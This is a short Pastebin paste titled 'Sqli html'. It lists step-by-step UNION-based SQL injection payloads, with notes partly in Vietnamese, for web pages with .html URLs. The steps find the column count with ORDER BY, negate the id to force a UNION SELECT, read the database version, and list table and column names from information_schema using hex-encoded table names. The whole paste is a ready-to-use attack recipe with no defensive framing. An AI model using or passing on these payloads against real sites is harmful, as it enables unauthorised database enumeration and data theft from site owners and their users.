Advertisement
hqlan1928

Sqli html

Dec 11th, 2013
178
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.42 KB | None | 0 0
  1. b1: order by x-- -.html
  2. b2: thay x trước union là -null -> union select x,x,x-- -.html
  3. b3: union select x,x,version(),x-- -.html
  4. b4: union select x,x,group_concat(table_name) from information_schema.tables where table_schema=database()-- -.html
  5. b5: get table chứa info
  6. union select x,x,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x(convert to hex)-- -.html
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement